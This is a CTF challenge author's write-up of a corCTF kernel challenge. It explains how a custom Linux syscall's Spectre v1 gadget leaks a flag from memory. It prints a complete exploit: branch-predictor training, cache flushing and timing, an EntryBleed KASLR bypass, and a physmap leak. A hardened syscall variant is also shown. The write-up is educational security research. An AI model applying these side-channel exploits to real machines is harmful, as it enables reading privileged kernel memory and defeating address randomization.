Following the theme of corCTF 2023, I wanted to release another exploitation challenge that connects kernel internals and modern x86_64 micro-architectural attacks. This year, players were presented with the following new syscalls on Linux 6.9.0.
```c
char corctf_note[0x10] = {0};

SYSCALL_DEFINE2(corctf_write_note, char *, addr, size_t, size)
{
    if (size > sizeof(corctf_note) - 1)
        return -EINVAL;
    return copy_from_user(corctf_note, addr, size);
}

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    uint64_t off = corctf_note[idx1];
    if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2)
    {
        return copy_to_user(addr + (off << stride), corctf_note + idx2, 1);
    }
    else
    {
        return -EINVAL;
    }
}
```
The kernel only ran off of an initramfs with the following QEMU boot command:
```sh
#!/bin/sh
qemu-system-x86_64 \
    -s \
    -m 512 \
    -smp 1 \
    -nographic \
    -kernel "bzImage" \
    -append "console=ttyS0 loglevel=3 panic=-1 oops=panic clearcpuid=smap pti=on no5lvl" \
    -no-reboot \
    -netdev user,id=net \
    -cpu host \
    -initrd "./initramfs.cpio.gz" \
    -enable-kvm
```
As mentioned to the players, the challenge was hosted on an i5-8250U, an 8th generation Intel CPU (though it also worked locally on 9th and 10th generation CPUs). I also made it clear to players to set the Linux scaling_governor to performance (echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor) - the intended micro-architectural side-channel exploit struggled to work reliably in powersave mode.
Based on the syscall implementation, there is a pretty clear OOB read bug in corctf_read_note. Hopefully, no one tried to rely solely on that vulnerability to write an LPE exploit. I'm pretty sure it can only result in a DoS due to oops=panic, but if you can pwn the Linux kernel with only one use of this primitive, please contact me.
This syscall implementation also has a side-channel problem. The access into the user-controlled buffer in copy_to_user depends on a value derived from a user-controlled index. Attackers can deduce the value of any memory location relative to corctf_note with a cache side-channel through the unchecked index. If one were to evict the entire user buffer from the CPU cache hierarchy beforehand, then this syscall could bring regions of it back into the cache with the off-dependent access. An attacker can then measure access times over the buffer to determine the original value of off, based on which user buffer region is the fastest to access. This gives away memory contents, as the value of off comes from the unchecked index into corctf_note.
One might wonder how the user buffer would even be accessed given an OOB index. After all, there is a conditional check that blocks the access for OOB indices. This is where the original insight from Spectre v1 comes in. Modern CPUs are extremely aggressive with optimizations and execute as many instructions as far in advance as possible - it's perfectly fine to execute instructions out of order internally as long as the final results remain architecturally correct. Conditional branches awaiting resolution can't just halt the entire pipeline, so modern micro-architectures employ a branch predictor that assumes a certain direction based on history at the branch address. Sometimes the prediction is wrong, so the CPU has to roll back state, but micro-architectural state such as cache contents is not rolled back (it would be very hard to do so without seriously hindering performance).
In this case, if one were to train this branch to always take the copy_to_user path, then an OOB index will cause this path to be taken transiently. The cache side-channel becomes a race between branch resolution (which depends on the calls to strlen on corctf_note) and the caching of the off-dependent user buffer address (which depends on the speed of the shift calculation and the MMU's resolution of the buffer's virtual address).
One common misconception I observed during the CTF was people thinking that KPTI and modern kernel mitigations have fixed Spectre v1. This is simply not true: KPTI was meant to address Meltdown (and not even completely), and Spectre v1 cannot be mitigated wholesale, as branch prediction is a fundamental modern CPU optimization. As discussed in a Linux kernel document, one can mitigate Spectre gadgets with the help of the nospec macro family (like array_index_nospec), which prevents speculation from using an out-of-bounds index, or with the usage of certain barriers. None of that exists in the custom syscall above. Technically, I believe the stac and clac instructions used by usercopy functions to disable and re-enable SMAP have barrier-like semantics, but I disabled SMAP in the kernel boot params above.
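For reference, here is a minimal sketch of my own (not the challenge's code, and untested) showing how the read syscall could have been hardened with the array_index_nospec macro from <linux/nospec.h>, which clamps an index to zero when the CPU mispredicts past the bounds check:

```c
#include <linux/nospec.h>

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    uint64_t len = strlen(corctf_note);
    uint64_t off;

    if (idx1 >= len || idx2 >= len)
        return -EINVAL;

    /* under misspeculation, these evaluate to 0 instead of an OOB index */
    idx1 = array_index_nospec(idx1, len);
    idx2 = array_index_nospec(idx2, len);

    off = corctf_note[idx1];
    return copy_to_user(addr + (off << stride), corctf_note + idx2, 1);
}
```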
One last piece of the puzzle remains - how can we use Spectre v1 to leak the flag? Well, the initramfs is always loaded in RAM, and it's loaded very early on, so it isn't affected by randomization (at least based on my observations). Given a kernel KASLR leak and a physmap base leak, we can then compute the offset necessary to side-channel out the flag.
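To make the arithmetic concrete, here is an illustrative sketch of how the two leaks combine into the out-of-bounds index (NOTE_OFFSET mirrors the constant used in the final exploit below, while FLAG_PHYS_OFFSET is a placeholder for the flag's physical offset):

```c
/* kaslr_base and physmap_base come from the two leaks described above */
uint64_t note_addr = kaslr_base + NOTE_OFFSET;        /* corctf_note in kernel .data */
uint64_t flag_addr = physmap_base + FLAG_PHYS_OFFSET; /* flag page in the direct map */
uint64_t evil_idx  = flag_addr - note_addr;           /* OOB index into corctf_note */
```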
I created the following primitives to set up a Spectre v1-based side-channel given a user-controlled buffer. Since we control the buffer, the easiest way to flush it from the cache hierarchy on x86_64 is the clflush instruction.
```c
void clflush(void *addr)
{
    asm volatile(INTEL(
        "clflush [%[addr]];"
    )::[addr]"r"(addr):);
}

void flush_buffer(void *addr, size_t size)
{
    for (off_t i = 0; i < size; i += LINE_SIZE)
    {
        clflush(addr + i);
    }
}
```
To time accesses, I rely on the rdtscp instruction, and use memory fences to help ensure accuracy.
```c
static inline uint64_t time_access(void *addr)
{
    uint64_t time;
    asm volatile(INTEL(
        "mfence;"
        "rdtscp;"
        "lfence;"
        "mov rbx, rax;"
        "mov rax, %[addr];"
        "mov rax, qword ptr [rax];"
        "rdtscp;"
        "lfence;"
        "sub rax, rbx;"
        "mov %[time], rax;")
        :[time]"=r"(time):[addr]"r"(addr):
        "rax", "rdx", "rcx", "rbx", "rsi", "rdi");
    return time;
}
```
Now for the main “Spectre” function to train the branch predictor:
```c
static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound)
{
    for (int i = 0; i < strlen(tlb_smart_write); i++)
    {
        corctf_read(buffer, i);
    }
    for (int i = 0; i < train; i++)
    {
        corctf_read(buffer, 0xd);
    }
    flush_buffer((void *)buffer, MAP_SIZE);
    asm volatile ("mfence;");
    corctf_read(buffer, idx);
    return get_time(buffer, offset);
}
```
I set up tlb_smart_write to be \x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi (apologies for the zoomer brainrot, I was under an extreme time crunch this year for corCTF development). The first for loop thus has the syscall use each of those values as the offset into the user buffer - as you will see later, I indexed into the user buffer by strides of 128 bytes (which provided cleaner results than 64 byte strides for me), so this acts as a mechanism to have the buffer's virtual addresses resolved in the TLB beforehand (which helps win the aforementioned Spectre race window). Despite KPTI being on, modern Intel CPUs have the PCID feature as a performance optimization, so those addresses are not flushed from the TLB on user/kernel transitions.
Afterwards, I trained the branch predictor a few times before flushing the entire user buffer from the whole cache hierarchy, triggering a mis-speculation with an evil index, and timing the access to a pre-specified offset in the buffer. Note that the index selects the memory location we want to leak, and the offset is the location in the user buffer we are currently timing for data collection.
With the above building blocks, I created the following side-channel primitive:
```c
uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound)
{
    uint64_t time[CHAR_SPACE] = {0};
    for (int times = 0; times < ITERS; times++)
    {
        for (uint32_t i = 0; i < bound; i++)
        {
            uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound);
            if (t < THRESHOLD)
                time[i]++;
        }
    }

    uint64_t max_val = 0, max = -1;
    for (int i = 0; i < bound; i++)
    {
        if (time[i] > max_val)
        {
            max = i;
            max_val = time[i];
        }
    }

    if (max != -1)
    {
        for (int i = 0; i < bound; i++)
        {
            printf("0x%02x: %lu, ", i, time[i]);
            if ((i + 1) % 16 == 0)
            {
                puts("");
            }
        }
        puts("");
    }

    return max;
}
```
In micro-architectural side-channels, it is always better to use a threshold scoring technique as seen above, as averages are too susceptible to noise and outliers. While this might not matter much here because DRAM accesses have quite a large timing difference compared to a generic cached access, a threshold scoring technique would fare much better if clflush were unavailable. Rather than evicting the buffer from the L3 cache into DRAM by "filling" the L3 cache between 1-2 times (as caches are not truly LRU and have other heuristics), we could just evict the buffer from the L1 and L2 caches, which takes substantially fewer accesses. The L2 to L3 timing difference can then be noticed through a threshold metric.
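As a rough sketch of that clflush-free idea (not part of my exploit): the cache sizes below are assumptions for an i5-8250U (32 KiB L1d and 256 KiB L2 per core), the evict_buf name is made up, and a simple linear walk is not guaranteed to evict every set, though in practice it usually suffices.

```c
#include <stddef.h>
#include <stdint.h>

#define EVICT_SIZE (2 * 256 * 1024) /* ~2x the per-core L2 size (assumption) */

static uint8_t evict_buf[EVICT_SIZE];

/* Touch one byte per cache line of a buffer larger than L2, pushing the
 * probe buffer's lines out of L1d/L2 so that later hits come from L3. */
static void evict_l1_l2(void)
{
    for (size_t i = 0; i < EVICT_SIZE; i += 64)
        *(volatile uint8_t *)&evict_buf[i];
}
```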
Now, armed with all these primitives, we can construct a Spectre v1 exploit to leak the flag from the filesystem cache.
To leak the kernel physmap base, we can just side-channel out the contents of page_offset_base, which will be at a fixed offset from corctf_note as both are in the kernel .data section. I noticed that page_offset_base's address also seems to be cached (at least in the TLB), as the kernel is probably using addresses near it quite frequently. A similar idea can be applied to a kernel text/data pointer to leak KASLR. However, I opted for an easier approach with the EntryBleed KASLR bypass side-channel, which I discuss in this post and in this paper.
With both address leaks in hand and knowledge of the file offset from physical memory base (which you determine beforehand through a memory search in QEMU monitor mode), the flag can be leaked. Here is the final exploit:
```c
uint8_t tlb_smart_write[0x10] = "\x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi";

void fail(char *msg)
{
    perror(msg);
    exit(1);
}

uint64_t entrybleed(uint64_t addr)
{
    uint64_t a, b, c, d;
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

uint64_t leak_syscall_entry(void)
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
        {
            uint64_t test = SCAN_START + idx * STEP;
            syscall(104);
            uint64_t time = entrybleed(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    for (int i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = SCAN_START + i * STEP;
        }
    }

    return addr;
}

uint64_t leak_kaslr(void)
{
    return leak_syscall_entry() - entry_SYSCALL_64_offset;
}

long corctf_write(char *addr, uint64_t size)
{
    return syscall(__NR_CORCTF_WRITE, addr, size);
}

long corctf_read(char *addr, uint64_t idx)
{
    return syscall(__NR_CORCTF_READ, addr, idx, 0, STRIDE_SHIFT);
}

void clflush(void *addr)
{
    asm volatile(INTEL(
        "clflush [%[addr]];"
    )::[addr]"r"(addr):);
}

void flush_buffer(void *addr, size_t size)
{
    for (off_t i = 0; i < size; i += LINE_SIZE)
    {
        clflush(addr + i);
    }
}

static inline uint64_t time_access(void *addr)
{
    uint64_t time;
    asm volatile(INTEL(
        "mfence;"
        "rdtscp;"
        "lfence;"
        "mov rbx, rax;"
        "mov rax, %[addr];"
        "mov rax, qword ptr [rax];"
        "rdtscp;"
        "lfence;"
        "sub rax, rbx;"
        "mov %[time], rax;")
        :[time]"=r"(time):[addr]"r"(addr):
        "rax", "rdx", "rcx", "rbx", "rsi", "rdi");
    return time;
}

static inline uint64_t get_time(char *buffer, off_t offset)
{
    return time_access(buffer + offset);
}

static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound)
{
    for (int i = 0; i < strlen(tlb_smart_write); i++)
    {
        corctf_read(buffer, i);
    }
    for (int i = 0; i < train; i++)
    {
        corctf_read(buffer, 0xd);
    }
    flush_buffer((void *)buffer, MAP_SIZE);
    asm volatile ("mfence;");
    corctf_read(buffer, idx);
    return get_time(buffer, offset);
}

uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound)
{
    uint64_t time[CHAR_SPACE] = {0};
    for (int times = 0; times < ITERS; times++)
    {
        for (uint32_t i = 0; i < bound; i++)
        {
            uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound);
            if (t < THRESHOLD)
                time[i]++;
        }
    }

    uint64_t max_val = 0, max = -1;
    for (int i = 0; i < bound; i++)
    {
        if (time[i] > max_val)
        {
            max = i;
            max_val = time[i];
        }
    }

    if (max != -1)
    {
        for (int i = 0; i < bound; i++)
        {
            printf("0x%02x: %lu, ", i, time[i]);
            if ((i + 1) % 16 == 0)
            {
                puts("");
            }
        }
        puts("");
    }

    return max;
}

uint8_t leak_byte_helper(char *buffer, uint64_t offset, uint64_t bound)
{
    uint64_t result = -1;
    printf("Attemping to leak offset 0x%lx\n", offset);
    while (result == -1)
    {
        result = sidechannel(buffer, TRAIN, offset, bound);
        if (result == -1)
            printf("retrying for offset 0x%lx\n", offset);
    }
    printf("Leaked: 0x%lx\n", result);
    return result;
}

uint8_t leak_byte(char *buffer, uint64_t offset, uint64_t bound)
{
    uint64_t first_leak = 0xdeadbabe;
    uint64_t second_leak = 0xdeadb00b;
    while (first_leak != second_leak)
    {
        first_leak = leak_byte_helper(buffer, offset, bound);
        second_leak = leak_byte_helper(buffer, offset, bound);
        if (first_leak != second_leak)
        {
            printf("mismatch in leak values: 0x%lx 0x%lx. retrying\n", first_leak, second_leak);
        }
    }
    return first_leak;
}

uint64_t leak_physmap(char *buffer, uint64_t offset)
{
    uint64_t qword = 0;
    for (int i = 3; i < 6; i++)
    {
        qword |= ((uint64_t)leak_byte(buffer, offset + i, 256)) << (i * 8);
    }
    qword |= 0xffff000000000000ull;
    return qword;
}

void main()
{
    char *flag = malloc(MAX_FLAG_LEN);
    char *buffer = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);

    if (!buffer || !flag)
    {
        fail("buffer allocation failed");
    }

    memset(flag, 0, MAX_FLAG_LEN);
    strcpy(flag, "corctf{");

    uint64_t kaslr_base = leak_kaslr();
    uint64_t note = kaslr_base + NOTE_OFFSET;
    printf("KASLR base: 0x%lx\n", kaslr_base);
    printf("note addr: 0x%lx\n", note);
    printf("page offset base: 0x%lx\n", note + NOTE_TO_POB);

    corctf_write(tlb_smart_write, strlen(tlb_smart_write));

    // bottom 3 bytes always 0, speed it up a bit
    uint64_t physmap_base = leak_physmap(buffer, NOTE_TO_POB);
    // uint64_t physmap_base = 0xffff888000000000ull;
    printf("physmap: 0x%lx\n", physmap_base);

    uint64_t flag_offset = 0x1f556000ull;

    // in case another page allocation happened beforehand
    while (leak_byte(buffer, physmap_base + flag_offset - note, 256) != flag[0])
    {
        puts("wrong first flag char, incrementing flag_offset");
        flag_offset += 0x1000;
    }

    int i = strlen(flag);
    uint8_t temp = 0;
    while ((temp = leak_byte(buffer, physmap_base + flag_offset + i - note, 0x80)) != '}')
    {
        flag[i++] = temp;
    }
    flag[i] = '}';
    printf("flag: %s\n", flag);
}
```
The flag takes about 5-10 minutes to fully leak, and that's with some optimizations, such as relying on the flag format and on the range of physmap under 4-level paging.
I originally had a harder version of this challenge too, themed around the syscall being architecturally bug-free rather than containing a DoS-able bug.
The syscall looked like this:
```c
SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2)
    {
        uint64_t off = corctf_note[idx1] << stride;
        return copy_to_user(addr + off, corctf_note + idx2, 1);
    }
    else
    {
        return -EINVAL;
    }
}
```
Now, there would never be any OOB access architecturally. However, this is a harder side-channel to perform - since the file cache address is not in the CPU cache (and perhaps not in the TLB either), it would have been extremely difficult for speculative execution to progress deep enough to leave a cache side-effect on the user buffer. One probable way to go about this is to prolong the speculation window by causing an eviction of corctf_note from the L3 cache and TLB, but the side-channel would probably take too long at that point given normal system noise. I opted to keep the file contents in cache with a "flag verifier daemon" - this version ended up working, but the side-channel success rate was still much lower. Since it didn't really introduce any new concepts and just required a player to perform more fine-tuning, I opted for the easier version of the challenge instead.
Overall, I thought this was a really nifty challenge to write, and I hope it brought something refreshing to the pwnable category in CTFs. I would like to give a huge shoutout to sampriti for taking first blood on this challenge. Zolutal from Shellphish claimed the second and final solve.
Some other challenges I wrote this year for corCTF included trojan-turtles, an L2 guest to L1 hypervisor KVM escape, and vmquack's combinator in collaboration with anematode, a functional programming VM built around normal-order evaluation of the untyped lambda calculus. I didn't make a writeup for the latter as the three solves were pretty much all just pattern match and replace, which I somewhat expected to be the case. It's a shame though, since it involved the highest development effort. I was inspired by this article to write a Scheme to lambda calculus compiler, but the ultimate bottleneck for the crackme's complexity was the poor runtime reduction performance.
I am looking forward to what comes next for development in corCTF
2025! Feel free to let me know if you have any questions or see any
mistakes, and hopefully, I’ll see some of you all for the Defcon Finals
afterparty.